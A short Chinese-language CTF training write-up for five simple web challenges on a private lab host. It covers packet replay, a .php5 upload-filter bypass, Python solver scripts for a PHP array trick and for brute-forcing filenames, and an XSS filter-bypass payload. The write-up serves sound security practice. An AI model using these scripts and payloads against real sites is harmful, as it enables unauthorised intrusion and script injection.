嘻嘻嘻,超酷的老大的简单题训练~
test1
抓包构造字段后重放攻击
test2
题目对上传文件类型和后缀名都进行了检查,但对php5并没有进行过滤。
查看源码:
test3
首先不要害怕 emmmmm 遇到php代码审计一定不要怂(尤其是简单的php!!!)附上解题脚本~
#!/usr/bin/env python
#coding:utf-8
import requests
import urllib
import re
url = "http://192.168.70.245/test3/"
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0'}
param = 'ea'
sess = requests.Session()
for i in range(12):
data = { 'value[]': urllib.unquote(param)}
res = sess.post(url, headers=headers, data=data).content
param = res[0:2]
flag = re.findall('flag.+?}', res)
print flag
test4
这里首先要把正则表达式看懂。
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
def a():
for i in ['3', '4', '5', '8']:
yield '1'+i+'9'
def b():
for j in range(10):
yield str(j)
def c():
for k in ['0', '5', '6']:
yield k
if __name__ == '__main__':
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0'}
url = "http://192.168.70.245/test4/"
for i1 in a():
for i2 in b():
for i3 in b():
for i4 in b():
for i5 in b():
for i6 in c():
for i7 in c():
for i8 in c():
for i9 in c():
url_ = url + i1 + i2 + i3 + i4 + i5 + i6 + i7 + i8 + i9 + '.php'
response = requests.get(url_, headers=headers)
if response.status_code == 200:
print(url_)
print(response.content)
exit(0)
或者写一个脚本做好字典,然后用御剑多线程跑出结果。
test5
这里只考察了xss的一些常用payload以及绕过,查看源码找出绕过方法,弹出框框就拿到了flag。
payload:'oninput=alert`1`//